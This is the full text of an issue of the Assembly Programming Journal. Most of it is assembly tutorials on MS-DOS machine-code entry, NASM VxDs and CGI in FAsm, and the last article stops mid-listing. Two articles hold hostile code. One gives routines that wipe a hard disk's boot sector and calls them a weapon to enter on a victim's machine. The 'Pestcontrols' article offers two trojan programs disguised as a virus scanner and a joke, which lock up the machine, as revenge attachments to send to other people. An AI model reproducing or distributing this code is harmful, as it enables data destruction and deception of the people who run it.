APJ issue coming from beyond the grave! Thanks to Tiago for taking this
over.
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Sep 00-Aug 01
:::\_____\::::::::::. Issue 9
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.com asmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction.............................................Tiago.Sanches
"Programming in extreme conditions".......................Kalmykov.b52
"Pestcontrols"...........................................Jan.Verhoeven
Column: Win32 Assembly Programming
"How to write VxDs using NASM".............................therain
"Common Gateway Interface using PE console apps"....Michael.Pruitt
Column: The Unix World
"Writing A Useful Program With NASM".................Jonathan.Leto
"Command Line in FreeBSD".........................G.Adam.Stanislav
"Compressing data"...................................Feryno.Gabris
Column: PalmOS Environment
"Hello Tiny World"..........................................Latigo
Column: Gaming Corner
"Win32 ASM Game Programming - Part 2"..................Chris.Hobbs
Column: Assembly Language Snippets
"Basic trigonometry functions"....................Eoin.O'Callaghan
"getpass"................................................Jake.Bush
"strcmp".................................................Jake.Bush
"strlwr".................................................Jake.Bush
"strupr".................................................Jake.Bush
Column: Issue Solution
"Exact Pattern Matching Algorithms"...............Steve.Hutchesson
"Binary String Search Algorithm".........................buliaNaza
----------------------------------------------------------------------
+++++++++++++++++++Issue Challenge++++++++++++++++++
Code a fast pattern matching algorithm
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by Tiago Sanches
Finally, issue 9 is out!
After a long, long time APJ is back. What happened?
Well, mainly because mammon_ lacked the free time to handle everything
concerning the journal by himself (which may have led to a shortage of
contributions), APJ had to be discontinued as of last year. The good news is
that the journal is back. Many people have volunteered to help out, so in the
future a staff may actually become a reality, allowing things to run more
smoothly than they have. On a side note, mammon_ is still administering the
journal, even if time constraints don't allow him to get as involved in its
management as before.
Anyway, about this issue: the articles range from CGI programming, written by
Michael Pruitt, to the continuation of Chris Hobbs' gaming series (which Chili
prepared for ASCII distribution). A new column has also been created for the
emerging PalmOS platform, featuring a very good introductory article by Latigo.
G. Adam Stanislav contributed another article for the Unix side, along with
Feryno Gabris, who presents an ELF compressor whose text might look somewhat
cryptic at first if not for the source code provided. Both are NASM oriented.
Also for NASM, therain shows how to write VxDs and Jonathan Leto provides an
article for the beginning assembly programmer.
Closing the list is a "back to the stone age" low-level programming article by
Kalmykov.b52 for when all you have is MS-DOS and, lastly, it's Jan Verhoeven's
payback day as he says: "This time the joke is on you!".
All in all this issue is packed with very good articles, not to mention the
great trigonometry macros by Eoin O'Callaghan in the snippets section, some
other pieces of code from Jake Bush and, at the end, the issue challenge, which
this time focuses on pattern matching algorithms and features great work by
Steve Hutchesson along with code presented by buliaNaza.
Just a reminder for contributors on submission guidelines: articles must be
written in English and may focus on any aspect of assembly language for any
level of programming, but remember that they must be in ASCII text format.
Here are some rules to follow:
- Lines should have a maximum of 80 characters (including the 'New Line'
character), with no left or right margins.
- Article subsections should consist of a subsection name followed by a line
of hyphens as an underscore, and be preceded by two carriage returns.
- Paragraphs should not be indented and must be separated by a blank line.
- Code indentation (opcodes) should be about 8 chars.
- Don't use TABs, use spaces instead!
That said, remember to supply a name or handle and a title for the article and
check the contents of the current issue for a general idea of the magazine's
format. You can mail articles, snippets or any other contribution to me at:
sanches@...
Hopefully, with your help, issue 10 will be out faster than this one and the
journal can start being released on a regular basis again.
As mammon_ would say, enjoy the mag!
Tiago Sanches
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Programming in extreme conditions
by Kalmykov.b52
INTRODUCTION
------------
What are 'extreme conditions'? You are sitting in front of a computer with
only MS-DOS installed, without any compilers, hex editors, shells or
debuggers, and you need to recover lost data, delete a virus, or write a new
one. These are extreme conditions. Most programmers won't be able to do
anything, and most administrators think that such a computer is 100% secure.
But this won't stop the assembly programmer ...
I have chosen pure MS-DOS as the operating system to program for because
Windows has many things that make this task easier (e.g. Windows 98 has a
built-in browser with VBScript and JavaScript interpreters, so you can easily
write a hex editor and more).
This article should be interesting for both beginners and experienced
programmers. I also recommend it to hackers, administrators, and anybody who
wants to feel the spirit of low-level programming, which is now disappearing
along with the previous generation of programmers.
THE BEGINNING
-------------
To read and understand this you will need, at a minimum, a knowledge of
assembler and experience working with MS-DOS. You will also need a list of
x86 instruction opcodes, an ASCII table, and a lot of free time. First of all,
we need some kind of text editor. But the administrator removed EVERYTHING
that could help us. Only one thing distinguishes a good programmer from any
other: deep knowledge of everything he works with. If he works with DOS, he
knows everything about it. There is an undocumented function that opens a tiny
text editor, and that's enough. Enter this DOS command:
C:\>copy con test.com
This starts the text editor. This is our instrument. But we still don't know
how to write binaries. If you look in the official MS-DOS manual, you'll find
the answer: using the ALT key and the numeric keypad you can enter arbitrary
byte values. First of all, check that NumLock is on. Now hold ALT, type 195,
then release ALT. To save the file and exit, press CTRL-Z and hit Enter. Now
run it. It doesn't do anything, but it doesn't hang the system either. If you
disassemble it you will find that test.com consists of a single instruction,
RETN. As you have already guessed, the opcode of RETN is 0xC3, which is 195 in
decimal.
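The opcode tables you will be reading from are in hex, while the keypad wants
decimal, so it helps to see the conversion spelled out. Here is a minimal
sketch in Python (not a tool the article uses; the helper name keypad_code is
made up for illustration) that turns a byte value into the keystroke to enter:

```python
def keypad_code(byte_value):
    """Return the ALT+keypad keystroke (decimal) that enters one byte."""
    if not 0 <= byte_value <= 255:
        raise ValueError("one ALT keystroke produces exactly one byte")
    return "ALT-" + str(byte_value)

RETN = 0xC3  # opcode of the near return used in test.com
print(keypad_code(RETN))  # ALT-195
```

On a machine that really has nothing installed you would do this conversion by
hand from the ASCII table; the sketch only shows the arithmetic.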
ADVANCED
--------
Well, that was easy. Now try to enter this:
ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT-32 Hi,world!$
Then press CTRL-Z and hit Enter. Clearly, this program prints "Hi,world!".
Let's disassemble it:
49E0:0100 start:
49E0:0100 B4 09 mov ah,9
49E0:0102 BA 0109 mov dx,offset data_1
49E0:0105 CD 21 int 21h ; DOS Services
; ah=function 09h
; display char
; string at ds:dx
49E0:0107 C3 retn
49E0:0108 20 db 20h
49E0:0109 48 69 2C 77 6F 72 data_1 db 'Hi,world!$'
; xref 49E0:0102
I hope you know about the reversed byte order in a machine word (ALT-09 ALT-01
= 0109h).
Also, in order to show the beauty of this method, I used the symbol '!' == 0x21
to call interrupt 0x21. So knowing ASCII codes can make your life easier. But
why do we need the extra symbol (20h == ALT-32 == " ") at 49E0:0108?
This is the main problem of this method. Using ALT and the numeric keypad we
cannot enter some byte values. Here is a list of them:
0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF)
You will need to avoid these values. If you look at the code, you'll see that
without the extra byte the string would start at offset 0x108, and 8 is on the
list. After adding the symbol the offset became 0x109.
Actually there is a more elegant way to get an awkward value into a register,
which is to load its neighbour and adjust:
mov dx,109h
dec dx
The two variants cost the same (dec dx == 1 byte), so choose whichever suits you
best. Another problem is finding the offsets of variables and labels. You can
write the program on paper, giving the variables symbolic names, and when the
program is ready it will be easy to find the necessary offsets and addresses.
Another possibility is declaring all variables before their usage:
mov ah,9
jmp short $+20
db 'Hi,world!$'
mov dx,0x100+2+2; 0x100 - the base address, 2 - length of
; mov ah,9, 2 - length of jmp
jmp short $+20 reserves 20 bytes for the string. This method can also be used
for labels.
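To make the padding trick concrete, here is a rough Python sketch (again, not
something the article itself uses) that rebuilds the "Hi,world!" program byte
by byte and checks it against the list of values that cannot be typed. The
helper names untypeable_offsets and hello_program are hypothetical; the opcode
bytes and the forbidden list are taken from the text above.

```python
import struct

# Byte values the article lists as impossible to enter with ALT + keypad.
UNTYPEABLE = {0, 3, 6, 8, 16, 19, 27, 255}

def untypeable_offsets(code, base=0x100):
    """Return (address, byte) pairs for every byte that cannot be typed."""
    return [(base + i, b) for i, b in enumerate(code) if b in UNTYPEABLE]

def hello_program(pad):
    """Build the 'Hi,world!' COM image with the given padding before the text."""
    code_len = 2 + 3 + 2 + 1                 # mov ah / mov dx / int 21h / retn
    text_at = 0x100 + code_len + len(pad)    # COM files are loaded at 100h
    return (b"\xB4\x09"                               # mov ah,9
            + b"\xBA" + struct.pack("<H", text_at)    # mov dx,imm16, low byte first
            + b"\xCD\x21"                             # int 21h
            + b"\xC3"                                 # retn
            + pad
            + b"Hi,world!$")

print(untypeable_offsets(hello_program(b"")))    # the 08 in "mov dx,0108h"
print(untypeable_offsets(hello_program(b" ")))   # empty: every byte can be typed
print(list(hello_program(b" ")[:9]))             # the decimal codes to enter
```

Without the pad byte the check flags address 103h, the low byte of the string
offset. With one space of padding the list is empty, and the first nine values
are exactly the sequence 180 9 186 9 1 205 33 195 32 entered earlier.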
THE EXAMPLE
-----------
I think you are tired of this theoretical programming and feel ready to see
the method at work. As an illustration we will create a program that erases
the boot sector. Attention! Using this program to destroy information is a
crime. You should use it only for experimental purposes.
First of all, let's write it in assembler:
B80103 mov ax,00301
B90100 mov cx,00001
BA8000 mov dx,00080
CD13 int 013
C3 retn
As you see we have one #0 and two #3. Let's modify the program to avoid
them:
xor ax,ax
mov ds,ax
mov ax,00299
inc ax
inc ax
xor cx,cx
inc cx
mov dl,80
mov bx,13h*4
pushf
cli
push cs
call dword ptr [bx]
retn
Maybe this is quite a hard example. Assembler programming and interrupts are
not really the subject of this article; I can only point you to the other
references that you can easily find on the Internet. Fortunately (or
unfortunately, depending on the reader's orientation), the BIOS has a boot
write protection (sometimes called "Virus warning"). It will block any
attempt to modify the main boot sector.
For example, running this program under the Windows 98 operating system will
have no effect. But we can still work with the hard drive I/O ports at a low
level. Here is an example of a program that will erase the main boot sector
through the hard drive I/O ports:
mov dx, 1F2h
mov al,1
out dx,al
inc dx
out dx,al
inc dx
xor ax,ax
out dx,al
inc dx
out dx,al
mov al, 10100000b
inc dx
out dx,al
inc dx
mov al,30h
out dx,al
lea si, Buffer
mov dx, 1F0h
mov cx, 513
rep outsw
I don't know of any popular protection that can track and block that program.
However, this does not apply to Windows NT: that OS won't allow any program
without the necessary privileges to work with ports, and it will even close
the application's window. Preparing this example for entry using ALT and
optimizing its size I will leave as an exercise for the reader. That's all:
enter this on a victim's machine and you have a powerful weapon. I recommend
using it very carefully.
ENDING
------
It's not easy. All this requires a lot of experience and talent, but gives you
incredible power over the machine (and I hope you won't be using this power
for destruction). All this may look quite useless, and you can say that you
won't need it - but who knows?.. Nowadays programmers depend on powerful
development tools (compilers, debuggers, editors), and when one is left alone
with 'nature' he cannot control the situation anymore - he cannot control the
machine ...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Pestcontrols
by Jan Verhoeven
Are you plagued now and then by friends and relatives who send you funny
pictures (mostly with a lot of "beneath the belt content") via E-mail?
I used to have them. I got rid of these pests.
How did I do it? I sent back some nice programs. And if they run Outlook
Express, they can't resist opening the attachment.
What I make is NOT a virus. It is at best a trojan horse, but in fact it
doesn't even come close to a trojan. No harm is done (intentionally) unless
the victim is a real moron and starts an unknown executable.
Pestcontrol 1: the virus scanner
--------------------------------
Most of the aforementioned morons know of the existence of virus scanners. So
they will be more than eager to try out the latest one, especially if it is as
compact as this one:
name scan
lf equ 10
cr equ 13
mov dx, offset text
mov ah, 9
int 021 ; show some message
back: cli ; disable keyboard etc
jmp back ; and do it again
mov ax, 04C00 ; by the time pigs can fly, ...
int 021 ; ... the program is halted.
text db 'Scanning your system....', cr, lf
db 'Please wait a minute. $'
db 1023 dup (073)
Yes, you are right, this COM file is something like 1 Kb in size. You can
easily control the size by adjusting the value in the last line. Make sure to
remain well under the 64K limit, else the file cannot be a COM file anymore
and there is a chance that a wraparound will occur in which your main routine
will be overwritten.
I hesitate to explain the program. It's so damned simple. In part 1 the
message is printed to the screen. In part 2 the computer is crippled and in
part 3 the program returns to the command interpreter, only this point is
never reached.... :o)
Believe me: people will wait HOURS before they get worried and try to
Alt-Ctrl-Del themselves a way out of this problem. Only to find out that
their efforts are in vain.
If this program is run from within a DOS box under Windows, and the user has a
lot of other tasks open, he will lose any unsaved work. And if he or she is on
a network, it may be crippled as well.
So be a little bit careful who you treat to this attachment.....
Pestcontrol 2: something funny
------------------------------
We all like jokes, don't we? So we send each other large breasted photos and
such. I have a joke to send back to these persons. It's a real funny program,
believe me. And efficient.
name funny
cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM
mov es, ax
mov ds, ax
L1: cli ; INT's off again, just in case...
mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn off INT's?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.
db 22K dup ('Í ') ; add some more muscles.
This is a real nasty program. One of the guys at work (two windows away from
my place; I could see the results...) had been sending me several 500 Kb
funnies. I asked him to remove me from his mailing list but he didn't listen.
So I shot back (hey, it was self defence!).
The first part of the program kills the keyboard and other interrupts,
whereas the second part plays a nasty trick on the user's screen. I assume the
user is running Windows on a VGA screen.... It keeps on pumping ZEROs into
display memory in a loop that's almost impossible to stop. If the CPU should
manage to enable interrupts again, it will lose control after another few
nanoseconds (on modern CPUs) or microseconds (on older ones).
The result is devastating: they run FUNNY.EXE (if there is no MZ in the
exe-header, the program is considered a COM file) and the screen turns black
immediately and they lose all control of the machine. The three fingered
salute will not help. The only option is to pull the plug.
This executable did the trick. Four requests to relieve me from his mail
assaults did not work. One counterattack with my Funny Exe was effective
immediately.
Afterthoughts
-------------
Yes, these programs are nasties. They should NOT be copied or used too soon.
On the other hand, Windows is so clumsily programmed (there should be IO
Privileges on task switching instructions like IN, OUT and CLI but there
aren't) that it enables malicious software to cause the effects they do.
Reminder
--------
The code published here is GNU GPL. Don't try this at home.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
How to write VxDs using NASM
by therain
I. About the readers and article's files overview
II. MASM vs NASM : Syntax overview
III. A skeleton VxD
IV. More VxD examples
V. FAQs
VI. About the writer
I. About the readers and article's files overview
-------------------------------------------------
This article is aimed at readers who have already done a little Virtual Device
Driver (VxD) programming using Microsoft's Macro Assembler (MASM). It only
covers how to use the Netwide Assembler (NASM) to write Virtual Device
Drivers, not how to learn VxD programming using NASM.
It is also suggested that the reader be familiar with NASM or read the NASM
documentation.
As for the files in this article:
NASMVXD.TXT - This article.
VXDN.INC    - Contains VxD related definitions and macros for NASM.
WINDDK.INC  - This is used by VXDN.INC and shouldn't be directly included
              by you. It contains VxD related EQU's and it also has VxD
              services covering VMM,Shell,Debug,...
II. Overview about MASM & NASM
------------------------------
It is time to mention that NASM was never intended to produce VxD files, and
you won't be able to produce any without the include files from this package
and without Microsoft's Incremental Linker (LINK.EXE).
Okay, now the syntax differences between MASM & NASM.
Processor Mode:
---------------
To enable the use of 386+ protected mode instructions you used to put a
'.386p' in MASM. There is no need for that in NASM; however, you have to
explicitly set the default bitness to 32 via the 'BITS 32' directive (and to
16 in the real mode initialization segment).
MASM: .386p
NASM: BITS 32
Segments specification:
-----------------------
MASM has a lot of segment declaration macros, unlike NASM, in which you have
to name the segment as you stated it in the .DEF file.
The 5 basic segment definition macros are:
MASM:                    NASM:            Description
-----                    -----            -----------
VxD_CODE_SEG/ENDS        segment _LTEXT   Protected mode code seg.
VxD_DATA_SEG/ENDS        segment _LDATA   Protected mode data seg.
VxD_ICODE_SEG/ENDS       segment _ITEXT   Protected mode initialization
                                          code segment. (usually optional)
VxD_IDATA_SEG/ENDS       segment _IDATA   Protected mode initialization
                                          data segment. (usually optional)
VxD_REAL_INIT_SEG/ENDS   segment _RTEXT   Real mode initialization
                                          segment. (optional too)
Notice that NASM does not need a segment closing macro unlike MASM.
To start a new segment just declare it like 'segment _LTEXT' and everything
after that line will go to that segment.
Please do not use the intrinsic form of the segment macro (e.g.
[segment _LTEXT]) as certain VxD macros rely on saving/restoring the current
segment and they would fail should you use the intrinsic form.
Check the FAQ for a brief segment overview or NASMDOC.TXT for full overview.
Virtual Device Descriptor Block (DDB) Declaration:
--------------------------------------------------
MASM:
-----
Declare_Virtual_Device Name, MajorVer, MinorVer, CtrlProc, DeviceNum,
InitOrder, V86Proc, PMProc, RefData
NASM:
-----
Due to the fact that NASM does not support string concatenation in macros
yet (there exist patched versions which do), the declaration is a bit
different:
Declare_Virtual_Device Name, 'Name', MajorVer, MinorVer, CtrlProc,
DeviceNum, InitOrder, V86Proc, PMProc, RefData
Params 5 to 9 are optional, since most of the time they are generic (not
used).
The extra parameter is 'Name', which will become the DDB_Name field in the
DDB (this is the name by which the VxD will be known to the VMM). Name
itself determines the name for the Control Procedure and the Service Table
(if used).
The DDB must be declared inside the _LDATA segment.
Example:
segment _LDATA
Declare_Virtual_Device SAMPVXD1, 'SAMPVXD1', 1, 0, SAMPVXD1_Control
Control Procedure Definition:
-----------------------------
MASM:
-----
Begin_Control_Dispatch NAME
Control_Dispatch Message,Proc
End_Control_Dispatch
NASM:
-----
This will be a little new for you since you have to do it by hand and not
with similar macros:
segment _LTEXT
VXDNAME_Control:
cmp eax,VM_INIT
je OnVmInit
cmp eax,W32_DEVICEIOCONTROL
je OnDIOC
cmp eax,<system message>
je <Desired Event handler proc>
clc ; At any time during initialization, a virtual device can set the
; carry flag and return to the VMM to prevent the virtual device
; from loading. This means that the carry flag must be cleared to
; allow loading.
retn
OnVmInit:
; Do some code
ret
OnDIOC: ; OnDeviceIoControl
; ESI points to a DIOCParams struct
cmp dword [esi+DIOCParams.dwIoControlCode],MY_DIOC_CODE
je domycode
retn ; Don't forget to put a return as you're used to put a
; "EndProc procname"
Any Other procedure Definition
------------------------------
Using NASM's normal procedure definition you can define a new proc as
usual: "procname :".
As for calling conventions you have to access the stack yourself or use some
other NASM macros.
Using VxdCall and VMMCall
-------------------------
In NASM you can call: VMMCall Service,param1,{param2},[ [{]param3[}] ],....
III. A skeleton VxD
--------------------
A skeleton VxD is a very basic VxD, just enough to be loaded correctly and do
nothing more than take up memory. =)
In NVXDSKEL.DEF you can specify whether it will be a DYNAMIC or a STATIC VxD,
like:
VXD MYVXD DYNAMIC ; dynamic vxd
VXD MYVXD ; static vxd
NVXDSKEL.DEF
------------
VXD NVXDSKEL DYNAMIC
SEGMENTS
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_RCODE CLASS 'RCODE'
EXPORTS
NVXDSKEL_DDB @1
NVXDSKEL.ASM
------------
bits 32
%include "vxdn.inc"
segment _LDATA
Declare_Virtual_Device NVXDSKEL,'NVXDSKEL',1,0,NVXDSKEL_Control
segment _LTEXT
NVXDSKEL_Control:
clc
retn
Assembling and linking:
-----------------------
* To assemble you must have NASM v0.98+
NASM NVXDSKEL.ASM -f win32
LINK NVXDSKEL.OBJ /VXD /DEF:NVXDSKEL.DEF
That's it!
IV. More VxD examples
---------------------
This example will show the use of VMMCall and VxDCall
VXDSAMP1.DEF
------------
VXD VXDSAMP1 DYNAMIC
SEGMENTS
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_RCODE CLASS 'RCODE'
EXPORTS
VXDSAMP1_DDB @1
VXDSAMP1.ASM
------------
bits 32
%include "vxdn.inc"
segment _LDATA
Declare_Virtual_Device VXDSAMP1,'VXDSAMP1',1,0,VXDSAMP1_Control
segment _LTEXT
VXDSAMP1_Control:
cmp eax,W32_DEVICEIOCONTROL
je OnDIOC
clc
retn
OnDIOC:
cmp dword [esi+DIOCParams.dwIoControlCode],1
je .1
xor eax,eax
jmp .ret
.1:
VMMCall Get_Sys_VM_Handle
xor esi,esi ; no callback
xor edx,edx ; no ref data for callback
mov eax,0
mov ecx,Msg
mov edi,Title
VxDCall SHELL_Message
.ret:
retn
segment _LDATA
Msg db 'Hello world!',0
Title db 'Title!',0
<EOF>
And another example that calls Int21/Ah=02,dl=7 to beep.
VXDSAMP2.ASM
------------
bits 32
%include "vxdn.inc"
segment _LDATA
Declare_Virtual_Device VXDSAMP2,'VXDSAMP2',1,0,VXDSAMP2_Control
segment _LTEXT
VXDSAMP2_Control:
cmp eax,W32_DEVICEIOCONTROL
je OnDIOC
clc
retn
OnDIOC:
cmp dword [esi+DIOCParams.dwIoControlCode],1
je .1
xor eax,eax
jmp .ret
.1:
VxDCall Begin_Nest_V86_Exec
mov word [ebp+CRS.EAX],0x0200
mov word [ebp+CRS.EDX],0x0007
mov eax,0x21
VxDCall Exec_Int
VxDCall End_Nest_Exec
.ret:
retn
<EOF>
Use a .DEF like the one in the previous example, but change the name to the
new VxD name.
To test the last two examples, just open the VxD with CreateFileA() and then
issue a DeviceIoControl() with code 1.
V. FAQs
-------
Q) Where can I get NASM and LINK from?
A) As for NASM you can get it from:
http://www.web-sites.co.uk/nasm/
As for LINK.EXE you can get it from the DDK or just download the MASM Pack
from http://win32asm.cjb.net
Q) How can I add new services and use them with NASM?
A) You can start by defining:
MyDevice_DeviceID equ 0x1234 ; must be word
and then define a service table like:
Begin_Service_Table MyDevice
VMM_Service MyService0 ; 0x0000 ord
VMM_Service MyService1 ; 0x0001 ord
VMM_Service MyServiceN ; ord N
End_Service_Table MyDevice
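For orientation, the numbering behind such a table can be sketched in a few
lines of Python (not part of the package). This assumes the usual VMM
convention that a service is identified by one dword, with the device ID in
the high word and the service ordinal in the low word; whether the macros in
VXDN.INC build it exactly this way is an assumption, and service_id is a
made-up helper name.

```python
def service_id(device_id, ordinal):
    """Combine a 16-bit device ID and a service ordinal into one dword."""
    if not 0 <= device_id <= 0xFFFF:
        raise ValueError("device ID must fit in a word")
    if not 0 <= ordinal <= 0xFFFF:
        raise ValueError("service ordinal must fit in a word")
    return (device_id << 16) | ordinal

MYDEVICE_ID = 0x1234                      # same value as MyDevice_DeviceID above
services = ["MyService0", "MyService1"]   # ordinals follow the table order

for ordinal, name in enumerate(services):
    print(name, "= 0x%08X" % service_id(MYDEVICE_ID, ordinal))
```

The point is only that the order of the VMM_Service lines fixes the ordinals,
so services should be appended at the end of the table, never inserted.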
VI. About the writers
---------------------
I, therain, would like to credit:
fOSSiL & The Owl - For creating VXDN.INC and for showing how to write VxDs
in NASM in the first place by demonstrating it in IceDump
(visit: http://icedump.tsx.org). And for reviewing/editing this document.
Iczelion - For his awesome win32asm resource site and for his
good VxD tutorials. (visit: http://win32asm.cjb.net)
UKC Team - For their support.
[The VXDN.INC and WINDDK.INC files can be obtained from
http://asmjournal.freeservers.com/files/nasmvxd.zip
where they have been archived along with the text of the article.]
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Common Gateway Interface using PE console apps
by Michael Pruitt
CGI: Tutorial 01: Supplying Dynamic Data to a Web Client
--------------------------------------------------------
In the early '90s the NCSA released HTTPd 1.0 (a web server), which included
a new concept: CGI. This feature allowed web content to be dynamically
generated on the server. Up-to-date reports of stocks, scores, and weather
were possible with CGI. Other uses include message boards, guest books, or
e-stores.
Typically a CGI application will interface with a Mosaic type web browser,
supplying HTML with the data. When the server receives a request targeting a
CGI program, it will launch the application. Any data from the client will be
piped to StdIn. The app's StdOut will then be sent back to the client.
Tools Needed
------------
This tutorial is written for FAsm (http://omega.im.uj.edu.pl/~grysztar/). If
you wish to assemble the program, you will need FAsm 1.13.4 (or later), or you
can translate it to another assembler supporting 80x86 PE console output.
For any CGI testing, access to a web server is a must. I recommend Apache
1.3.20 (http://httpd.apache.org/). For starting out, you can place your
assembled executable into the \Apache\cgi-bin\ directory. For the server name
use "localhost" (excluding the quotes).
Knowledge of HTML (HyperText Markup Language) is useful. The basics of HTML
are easy to learn. CSS (Cascading Style Sheets) will prove invaluable if you
use a lot of HTML. A list of books is provided at the end of this article.
A Win32 platform. My system consists of Win 98 SE on a Celeron 433 w/ 128MB
RAM. Win 95 - NT should work without issues. A Linux box running WINE should
also work for those with a strong stomach.
Win32 API
---------
Since everything a CGI application does is non GUI, kernel32.dll will suffice
for most projects. Database intensive apps will link to other DLLs to better
implement designs.
To access the Standard I/O, you will need to use GetStdHandle. Under Win32,
StdIO is not available under predefined handles. ReadFile and WriteFile are
used to move data. ReadConsole and WriteConsole will not work, because they
do not support redirected handles.
CGI Environment
---------------
A CGI program is not required to read data, but it is required to send it.
Client data is available on StdIn. The length is in the CONTENT_LENGTH
environment variable. Also, data appended to the URL after a '?' is in the
QUERY_STRING EnvVar. All output must start with "Content-Type:", a space, the
type, and two newlines (CrLf). Common types include: "text/plain",
"text/html", or "image/gif". Example output:
Content-Type: text/plain

Hello World. Example of HTTP 1.1 header and body.
If you don't write any data, the web server will report the error:
"Premature end of script headers". If you really don't want to supply data,
you could just write: "Content-Type: text/plain" and two newlines.
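The contract described above is small enough to sketch in a few lines. The
following Python fragment is only an illustration of the protocol, not the
tutorial's method (which uses FAsm and the Win32 API below); the function
names read_client_data and cgi_response are made up, and the request is
simulated rather than supplied by a real server.

```python
import io

def read_client_data(environ, stdin):
    """Read exactly CONTENT_LENGTH bytes of client data from a binary stream."""
    length = int(environ.get("CONTENT_LENGTH") or 0)
    return stdin.read(length) if length > 0 else b""

def cgi_response(body, content_type="text/plain"):
    """Prefix the body with the Content-Type line and the empty line after it."""
    header = "Content-Type: " + content_type + "\r\n\r\n"
    return header.encode("ascii") + body

# Simulated request: a real server supplies the environment and the pipe.
fake_env = {"CONTENT_LENGTH": "9"}
fake_stdin = io.BytesIO(b"name=test&ignored")

data = read_client_data(fake_env, fake_stdin)
print(cgi_response(b"You sent: " + data))
```

Note that the reader stops at CONTENT_LENGTH bytes instead of waiting for end
of file; a CGI program should not assume the server closes the pipe.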
The Example Program
-------------------
The program I've supplied writes HTML containing the current date and time. It
demonstrates use of APIs, HTML, and data manipulation.
~~~~~~~~~~~~~~~~~~~|||-------------------[code]-------------------|||
format PE console
entry Start
include '\Asm_Win32\Include\_Kernel.inc'
include '\Asm_Win32\Include\macro\stdcall.inc'
include '\Asm_Win32\Include\macro\import.inc'
Cr = 0x0D
Lf = 0x0A
;***---------------------------------------------------------------***
section '.code' code readable executable
Start:
pusha ;Save all of the Registers
stdcall [GetStdHandle], STD_OUTPUT_HANDLE ;Retrieve the actual handle
mov [StdOut], eax
cmp eax, INVALID_HANDLE_VALUE ;Error with handle
jz Exit
Get_Time:
stdcall [GetSystemTime], Time ;Load SYSTEMTIME with UTC
call Format_Time ;Convert Hex(bin) to ascii
; and Place into HTML
Write:
stdcall [WriteFile], [StdOut], HTML, HTML._size, HTML.Len, 0
;Write the HTML to StdOut
Exit:
popa ;Restore all of the Registers
stdcall [ExitProcess], 0
;***-------------------------[Subroutine]--------------------------***
Format_Time:
mov ax, [Time.wYear] ;16b Data
mov edi, HTML.Date_S + 9 ;Ptr to LAST byte of dest
call .ascii ;Convert and place into HTML
mov ax, [Time.wDay]
mov edi, HTML.Date_S + 4
call .ascii
mov ax, [Time.wMonth]
mov edi, HTML.Date_S + 1
call .ascii
mov edi, HTML.Day_S ;Destination Ptr
mov esi, Day.Wk ;Source Ptr (Array of Days)
xor eax, eax
mov ax, [Time.wDayOfWeek] ;0 <= eax < 7
add esi, eax ;esi =+ eax * 3
add esi, eax ; Indexes the Array
add esi, eax
mov ecx, 3 ;3B per Day String
cld ;Copy Left to Right
rep ; (esi++, edi++)
movsb
mov ax, [Time.wHour]
cmp al, 12 ;Check for PM
jl .wHour
mov byte [HTML.Time_S + 9], 'P' ; AM -> PM (MOV leaves the flags alone)
je .wHour ;12 PM needs no correction
sub al, 12 ;Correct Hour
.wHour:
mov edi, HTML.Time_S + 1
call .ascii
mov ax, [Time.wMinute]
mov edi, HTML.Time_S + 4
call .ascii
